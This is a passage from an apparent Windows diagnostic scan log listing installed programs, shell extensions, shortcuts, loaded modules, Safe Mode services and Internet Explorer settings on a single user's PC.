Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.) Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Graphics Rules Maker (HKLM-x32\...\Graphics Rules Maker) (Version: 1.1.0 - SimsNetwork.com) HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.10.298 - SurfRight B.V.) Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation) Lenovo Service Bridge (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1) (Version: 5.0.2.2 - Lenovo) Lenovo System Update (HKLM-x32\...\TVSU_is1) (Version: 5.07.0118 - Lenovo) Malwarebytes version 4.3.3.116 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.3.116 - Malwarebytes) MATLAB R2019b (HKLM\...\Matlab R2019b) (Version: 9.7 - MathWorks) Maxon Cinema 4D 23 (HKLM\...\Maxon Cinema 4D R23) (Version: R23 - Maxon) McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R31 - McAfee, LLC) Microsoft 365 Apps for enterprise - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.13929.20296 - Microsoft Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 90.0.818.51 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\OneDriveSetup.exe) (Version: 21.073.0411.0002 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\OneDriveSetup.exe) (Version: 19.043.0304.0013 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Teams) (Version: 1.3.00.28779 - Microsoft Corporation) 
Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Teams) (Version: 1.3.00.26064 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{A0E1B43D-5F4A-46AF-9925-ABA3423325DC}) (Version: 2.77.0.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 (HKLM-x32\...\{855e31d2-9031-46e1-b06d-c9d7777deefb}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29913 (HKLM-x32\...\{03d1453c-7d5c-479c-afea-8482f406e036}) (Version: 14.28.29913.0 
- Microsoft Corporation) Microsoft Visual Studio Code (User) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.56.0 - Microsoft Corporation) Node.js (HKLM\...\{C6D70F34-C254-4D55-B4A0-55F921939297}) (Version: 15.14.0 - Node.js Foundation) NVIDIA FrameView SDK 1.1.4923.29781331 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.1.4923.29781331 - NVIDIA Corporation) NVIDIA GeForce Experience 3.22.0.32 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.22.0.32 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.13929.20216 - Microsoft Corporation) Hidden Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook) Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook) PowerPoint (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\319814cb56b667dff88f54e08be8f51f) (Version: 1.0 - PowerPoint) Python 3.9.4 (64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{e300c142-10a9-46f4-a195-bd40cb90a84f}) (Version: 3.9.4150.0 - Python Software Foundation) Python 3.9.4 Add to Path (64-bit) (HKLM\...\{D5076D33-101B-4402-AAC0-001C6D74D9AB}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Core Interpreter (64-bit) (HKLM\...\{DE09AD3C-F617-4EAF-B4F5-943473CB00DA}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Development Libraries (64-bit) (HKLM\...\{CCD8CD39-7BDE-46B9-9222-336226D0C346}) (Version: 
3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Documentation (64-bit) (HKLM\...\{C625291F-C4B5-45A7-B946-FFAB8535A64A}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Executables (64-bit) (HKLM\...\{A8C63C1D-BCF8-4446-AFAA-AE21DDA1DBEF}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 pip Bootstrap (64-bit) (HKLM\...\{2E65BC05-C532-4BD6-ACDD-3CFDE86F5E36}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Standard Library (64-bit) (HKLM\...\{D8D430E7-0DCE-418C-A937-735F329C1AD8}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Tcl/Tk Support (64-bit) (HKLM\...\{E4228F0E-C40C-403A-9533-29BA5A9F9E99}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Test Suite (64-bit) (HKLM\...\{86FD19A0-F018-465C-B8C9-02EA01D35A4B}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Utility Scripts (64-bit) (HKLM\...\{0C0FBC09-C0AA-4B66-92BF-E321BC8C9FA5}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python Launcher (HKLM-x32\...\{12B4CAFF-F2FA-422B-B30C-2265217D8CF8}) (Version: 3.9.7398.0 - Python Software Foundation) s3pe - Sims3 Package Editor (HKLM-x32\...\s3pe) (Version: 14-0222-1852 - Peter L Jones) SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group) Spotify (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Spotify) (Version: 1.1.54.592.gc0b20638 - Spotify AB) Teams Machine-Wide Installer (HKLM-x32\...\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}) (Version: 1.4.0.4167 - Microsoft Corporation) The Sims 2: Ultimate Collection (HKLM-x32\...\{04450C18-F039-4B81-A621-70C3B0F523D5}) (Version: 1.0.0.1 - Electronic Arts) The Sims™ 3 [anadius Repack] (HKLM-x32\...\The Sims™ 3_is1) (Version: 1.67.2.024037 - ) TSR Workshop (HKLM-x32\...\{F68B3749-D483-47E6-9BB8-097906F9D471}) (Version: 2.2.92 - The Sims Resource) USB Disk Security (HKLM-x32\...\USB 
Disk Security_is1) (Version:  - Zbshareware Lab) Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden WebAdvisor by McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.586 - McAfee, LLC) WinRAR 6.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.01.0 - win.rar GmbH) Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word) Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word) Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\ZoomUMX) (Version: 5.4.9 (59931.0110) - Zoom Video Communications, Inc.) Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\ZoomUMX) (Version: 5.0 - Zoom Video Communications, Inc.)   Packages: ========= Adobe XD -> C:\Program Files\WindowsApps\Adobe.CC.XD_36.2.32.5_x64__adky2gkssdxte [2021-04-10] (Adobe Systems Incorporated) Adobe-Fresco -> C:\Program Files\WindowsApps\Adobe.Fresco_2.2.0.393_x64__pc75e8sa7ep4e [2021-04-10] (Adobe Inc.) Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.4213.0_x64__8wekyb3d8bbwe [2021-04-28] (Microsoft Studios) [MS Ad] NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.960.0_x64__56jybvy8sckqj [2021-01-20] (NVIDIA Corp.) 
Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2021.39122.10110.0_x64__8wekyb3d8bbwe [2021-03-12] (Microsoft Corporation) Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-07] (Microsoft Corporation) PowerPoint -> C:\Program Files\WindowsApps\powerpoint.office.com-8D456796_1.0.0.2_neutral__sxc7ffma4ybfy [2021-05-06] (powerpoint.office.com)   ==================== Custom CLSID (Whitelisted): ==============   (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)   CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. 
-> ) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2021-02-02] (Adobe Inc. -> Adobe Systems Inc.) ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. 
-> ) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2021-02-02] (Adobe Inc. -> Adobe Systems Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal)   ==================== Codecs (Whitelisted) ====================   (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)   HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com) HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com)   ==================== Shortcuts & WMI ========================   (The entries could be listed to be restored or removed.)   
ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Excel.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=leffmjdabcgaflkikcefahmlgpodjkdm --app-url=hxxps://excel.office.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Outlook.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=bjhmmnoficofgoiacjaajpkfndojknpb --app-url=hxxps://outlook.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Word.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=hikhggiobiflkdfdgdajcfklmcibbopi --app-url=hxxps://word.office.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt (anaconda3).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> "/K" C:\Users\FRANCIS\anaconda3\Scripts\activate.bat C:\Users\FRANCIS\anaconda3   ==================== Loaded Modules (Whitelisted) =============   2021-03-08 12:25 - 2021-03-08 12:25 - 000365056 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\92d73c1b4f373c56f37354527cf8180a\Interop.CxHDAudioAPILib.ni.dll 2021-03-08 12:25 - 2021-03-08 12:25 - 000018944 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\b532a24672ce5738c417f60f93ec4be1\Interop.CxUtilSvcLib.ni.dll 2020-10-01 12:14 - 2010-12-08 15:21 - 000753664 _____ (BCGSoft Co Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGPStyle2010Blue150.dll 2020-10-01 12:14 - 2015-01-31 10:08 - 006062080 _____ (BCGSoft Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGCBPRO1500u80.dll 2020-09-28 20:17 - 
2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [File not signed] [File is in use] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll 2020-10-01 12:14 - 2015-01-31 10:08 - 001093120 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\USB Disk Security\MFC80U.DLL 2020-10-01 16:40 - 2020-10-01 16:40 - 000057344 _____ (Microsoft Corporation) [File not signed] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.762_none_43efccf17831d131\MFC80ENU.DLL 2020-12-22 09:08 - 2020-05-30 14:58 - 001280000 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\x86\SQLite.Interop.dll   ==================== Alternate Data Streams (Whitelisted) ========   (If an entry is included in the fixlist, only the ADS will be removed.)   AlternateDataStreams: C:\ProgramData\TEMP:7C9E34A2 [260]   ==================== Safe Mode (Whitelisted) ==================   (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)   
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"   ==================== Association (Whitelisted) =================   ==================== Internet Explorer (Whitelisted) ==========   
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =  SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =  BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC) BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Adobe Acrobat Create PDF Helper -> 
{AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC) BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) DPF: HKLM-x32 {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/stg_drm.ocx DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}  DPF: HKLM-x32 {CC450D71-CC90-424C-8638-1F2DBAC87A54} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/armhelper.ocx Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft 
Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC)   (If an entry is included in the fixlist, it will be removed from the registry.)   IE trusted site: HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\sharepoint.com -> hxxps://mymailmapuaedu-files.sharepoint.com   ==================== Other Areas ===========================   (Currently there is no automatic fix for this section.)   
